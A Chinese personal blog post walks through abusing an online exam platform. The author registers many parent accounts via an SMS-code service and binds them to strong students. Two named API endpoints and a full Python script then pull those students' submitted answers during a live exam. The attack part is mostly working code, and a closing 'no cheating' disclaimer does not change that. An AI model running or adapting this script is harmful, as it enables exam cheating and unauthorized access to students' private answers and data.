

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Tonyha7">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言半年之前搞过某师某课 可能学校意识到普遍分数过高是平台的问题 于是换了某分数提交考试卷子既然是教育网站 那么或多或少会有一些脑瘫问题本着研究但不利用的原则 便有了以下折腾的过程 过程思路1-失败通过考完试比对答案的接口 假装考试已经结束 发送数据来请求答案结果：很显然 人家已经想到了这个问题 不出分是无法获取到答案的 思路2依稀记得家长端在绑定学生时 只需要输入对应的姓名和学号即可那么可不可以">
<meta property="og:type" content="article">
<meta property="og:title" content="某分数的脑瘫漏洞">
<meta property="og:url" content="https://www.tonyha7.gay/2022/11/30/%E6%9F%90%E5%88%86%E6%95%B0%E7%9A%84%E8%84%91%E7%98%AB%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="th7的小窝">
<meta property="og:description" content="前言半年之前搞过某师某课 可能学校意识到普遍分数过高是平台的问题 于是换了某分数提交考试卷子既然是教育网站 那么或多或少会有一些脑瘫问题本着研究但不利用的原则 便有了以下折腾的过程 过程思路1-失败通过考完试比对答案的接口 假装考试已经结束 发送数据来请求答案结果：很显然 人家已经想到了这个问题 不出分是无法获取到答案的 思路2依稀记得家长端在绑定学生时 只需要输入对应的姓名和学号即可那么可不可以">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://file.moetu.org/images/2022/11/30/QQ2022113016084910b9d203bd6441b9.png">
<meta property="og:image" content="https://file.moetu.org/images/2022/11/30/QQ2022113016152337787bb6a3ff1f0c.png">
<meta property="og:image" content="https://file.moetu.org/images/2022/11/30/1669797102921733a2e84f10e496c.png">
<meta property="og:image" content="https://file.moetu.org/images/2022/11/30/16697974244783cc94e717b800755.png">
<meta property="og:image" content="https://file.moetu.org/images/2022/11/30/16697980380364dd53c1cbbb9d6f6.png">
<meta property="og:image" content="https://file.moetu.org/images/2022/11/30/_202211301701057972bff817c29be4.png">
<meta property="article:published_time" content="2022-11-30T09:04:00.000Z">
<meta property="article:modified_time" content="2022-12-01T00:49:22.812Z">
<meta property="article:author" content="Tonyha7">
<meta property="article:tag" content="逆向">
<meta property="article:tag" content="教育">
<meta property="article:tag" content="网络">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://file.moetu.org/images/2022/11/30/QQ2022113016084910b9d203bd6441b9.png">
  
  
  
  <title>某分数的脑瘫漏洞 - th7的小窝</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.tonyha7.gay","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>th7的小窝</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="某分数的脑瘫漏洞"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-11-30 17:04" pubdate>
          2022年11月30日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          20 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">某分数的脑瘫漏洞</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>半年之前搞过<a target="_blank" rel="noopener" href="https://www.52pojie.cn/thread-1613563-1-1.html">某师某课</a> 可能学校意识到普遍分数过高是平台的问题 于是换了某分数提交考试卷子<br>既然是教育网站 那么或多或少会有一些<em>脑瘫</em>问题<br>本着研究但不利用的原则 便有了以下折腾的过程</p>
<h2 id="过程"><a href="#过程" class="headerlink" title="过程"></a>过程</h2><h3 id="思路1-失败"><a href="#思路1-失败" class="headerlink" title="思路1-失败"></a>思路1-失败</h3><p>通过考完试比对答案的接口 假装考试已经结束 发送数据来请求答案<br>结果：<br><img src="https://file.moetu.org/images/2022/11/30/QQ2022113016084910b9d203bd6441b9.png" srcset="/img/loading.gif" lazyload alt="QQ2022113016084910b9d203bd6441b9.png"><br>很显然 人家已经想到了这个问题 不出分是无法获取到答案的</p>
<h3 id="思路2"><a href="#思路2" class="headerlink" title="思路2"></a>思路2</h3><p>依稀记得家长端在绑定学生时 只需要输入对应的姓名和学号即可<br>那么可不可以用家长端绑定好学生 在考试期间获取他们的答案呢？<br>先说结果 这个思路是可以的<br>已知每个家长号能绑定最多两个学生 且半年后才能换绑<br>那么我们只要注册足够多的家长号 即可随便绑学生<br>这里用x码平台 具体懂得都懂<br><img src="https://file.moetu.org/images/2022/11/30/QQ2022113016152337787bb6a3ff1f0c.png" srcset="/img/loading.gif" lazyload alt="QQ2022113016152337787bb6a3ff1f0c.png"><br>然后我们每个号绑定一个好学生<br>接下来分析提交的答案是怎么获取的<br>首先明确这个平台的几个概念：<br>不管是学生号还是家长号 都是一个账号对应一个hfs-session-id<br>家长号切换孩子后 同样的hfs-session-id获取到的卷子为切换到的学生的<br>考试部分获取答案总共需要两个包<br>第一个：<br><img src="https://file.moetu.org/images/2022/11/30/1669797102921733a2e84f10e496c.png" srcset="/img/loading.gif" lazyload alt="1669797102921733a2e84f10e496c.png"></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//</span>hfs-be.yunxiao.com<span class="hljs-regexp">/v2/</span>online-exams/token?examId=考试id&amp;paperId=完整的试卷id<br></code></pre></td></tr></table></figure>
<p>这里需要注意一下 发包时除了要处理headers<br>还要把hfs-session-id写到cookies里去<br>成功的话 会返回一个阅卷token<br>第二个：<br>利用这个阅卷token去获取已经提交的答案<br><img src="https://file.moetu.org/images/2022/11/30/16697974244783cc94e717b800755.png" srcset="/img/loading.gif" lazyload alt="16697974244783cc94e717b800755.png"></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//y</span>j-apigw.haofenshu.com<span class="hljs-regexp">/v370/</span>structure/online?paperid=试卷id<br></code></pre></td></tr></table></figure>
<p>这里需要注意 这个包不要有cookies<br>要把获取到的阅卷token加到headers里<br>成功的话 会返回一个json 里面存有选项和提交的答案<br><img src="https://file.moetu.org/images/2022/11/30/16697980380364dd53c1cbbb9d6f6.png" srcset="/img/loading.gif" lazyload alt="16697980380364dd53c1cbbb9d6f6.png"><br>（这里还没提交 所以是空的）<br>然后 我们模拟这个流程 用python写个发包解析的程序</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs routeros">import requests<br>import json<br><br><span class="hljs-attribute">examid</span>=<span class="hljs-string">&quot;考试id&quot;</span><br><span class="hljs-attribute">paperid</span>=<span class="hljs-string">&quot;试卷id&quot;</span><br><span class="hljs-attribute">paperidfull</span>=<span class="hljs-string">&quot;完整的试卷id&quot;</span><br><br>stu_tokens = [<br>    <span class="hljs-string">&quot;eyxxxxxxx&quot;</span>,#家长token<br>]<br><br><span class="hljs-attribute">count</span>=1<br><span class="hljs-keyword">for</span> stu <span class="hljs-keyword">in</span> stu_tokens:<br>    <span class="hljs-attribute">url</span>=<span class="hljs-string">&quot;https://hfs-be.yunxiao.com/v2/online-exams/token?examId=&quot;</span>+examid+&quot;&amp;paperId=&quot;+paperidfull<br>    cookie = &#123;<span class="hljs-string">&#x27;hfs-session-id&#x27;</span>: stu&#125;<br>    headers = &#123;<span class="hljs-string">&#x27;devicetype&#x27;</span>: <span class="hljs-string">&#x27;1&#x27;</span>,<span class="hljs-string">&#x27;apptype&#x27;</span>: <span class="hljs-string">&#x27;1&#x27;</span>,<span class="hljs-string">&#x27;versionname&#x27;</span>: <span class="hljs-string">&quot;4.30.91&quot;</span>,<span class="hljs-string">&#x27;user-agent&#x27;</span>: <span class="hljs-string">&quot;YX Android 10&quot;</span>&#125;<br>    <span class="hljs-attribute">req</span>=requests.get(url=url,headers=headers,cookies=cookie)<br>    #<span class="hljs-built_in">print</span>(req.text)<br>    <span class="hljs-attribute">yuejuan</span>=json.loads(req.text).get(&#x27;data&#x27;).get(&#x27;token&#x27;)<br>    headers.update(&#123;<span class="hljs-string">&#x27;hfs-app-token&#x27;</span>: yuejuan&#125;)<br>    <span class="hljs-attribute">url</span>=<span class="hljs-string">&quot;https://yj-apigw.haofenshu.com/v370/structure/online?paperid=&quot;</span>+paperid<br>    <span class="hljs-attribute">req</span>=requests.get(url=url,headers=headers)<br>    #<span class="hljs-built_in">print</span>(req.text)<br>    <span class="hljs-attribute">keguanti</span>=json.loads(req.text).get(&#x27;data&#x27;).get(&#x27;keguanti&#x27;)<br>    <span class="hljs-attribute">zhuguanti</span>=json.loads(req.text).get(&#x27;data&#x27;).get(&#x27;zhuguanti&#x27;)<br>    <span class="hljs-keyword">for</span> dati <span class="hljs-keyword">in</span> keguanti:<br>        <span class="hljs-built_in">print</span>(dati[<span class="hljs-string">&quot;name&quot;</span>])<br>        <span class="hljs-attribute">questions_list</span>=dati[<span class="hljs-string">&quot;questions&quot;</span>]<br>        <span class="hljs-keyword">for</span> xiaoti <span class="hljs-keyword">in</span> questions_list:<br>            <span class="hljs-keyword">if</span> xiaoti[<span class="hljs-string">&quot;stuAns&quot;</span>] !=<span class="hljs-string">&quot;&quot;</span> <span class="hljs-keyword">and</span> xiaoti[<span class="hljs-string">&quot;stuAns&quot;</span>] !=<span class="hljs-string">&quot;-&quot;</span>:<br>                <span class="hljs-built_in">print</span>(xiaoti[<span class="hljs-string">&quot;name&quot;</span>]+<span class="hljs-string">&quot; &quot;</span>+xiaoti[<span class="hljs-string">&quot;stuAns&quot;</span>])<br>    <span class="hljs-keyword">for</span> ti <span class="hljs-keyword">in</span> zhuguanti:<br>        <span class="hljs-attribute">pic_list</span>=ti[<span class="hljs-string">&quot;httpPath&quot;</span>]<br>        <span class="hljs-keyword">if</span> pic_list != None:<br>            <span class="hljs-built_in">print</span>(ti[<span class="hljs-string">&quot;name&quot;</span>]+<span class="hljs-string">&quot; &quot;</span>+<span class="hljs-string">&quot; &quot;</span>.join(pic_list))<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;========== |&quot;</span>+str(count))<br>    count+=1<br></code></pre></td></tr></table></figure>
<p>在考试结束的交卷时间里 我们一直重复运行即可<br><img src="https://file.moetu.org/images/2022/11/30/_202211301701057972bff817c29be4.png" srcset="/img/loading.gif" lazyload alt="_202211301701057972bff817c29be4.png"></p>
<h2 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h2><p><strong>严禁作弊！！！</strong><br><strong>严禁作弊！！！</strong><br><strong>严禁作弊！！！</strong></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E7%AC%94%E8%AE%B0/" class="category-chain-item">笔记</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E9%80%86%E5%90%91/">#逆向</a>
      
        <a href="/tags/%E6%95%99%E8%82%B2/">#教育</a>
      
        <a href="/tags/%E7%BD%91%E7%BB%9C/">#网络</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>某分数的脑瘫漏洞</div>
      <div>https://www.tonyha7.gay/2022/11/30/某分数的脑瘫漏洞/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Tonyha7</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年11月30日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/11/30/%E8%AE%B0%E8%A7%A3%E5%8C%85%E4%B8%80%E4%B8%AAUnity%E5%BC%95%E6%93%8E%E7%9A%84%E8%A7%86%E8%A7%89%E5%B0%8F%E8%AF%B4-%E8%8B%8D%E4%B9%8B%E5%BD%BC%E6%96%B9%E7%9A%84%E5%9B%9B%E9%87%8D%E5%A5%8F/" title="记解包一个Unity引擎的视觉小说(苍之彼方的四重奏)">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">记解包一个Unity引擎的视觉小说(苍之彼方的四重奏)</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/11/30/hello-world/" title="Hello World">
                        <span class="hidden-mobile">Hello World</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  <article id="comments" lazyload>
    
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"jzJI48tPMmUGPvP0KDfz9Kdx-gzGzoHsz","appKey":"RioGUkZeEPyFZpjMtWdazfoK","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


  </article>


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
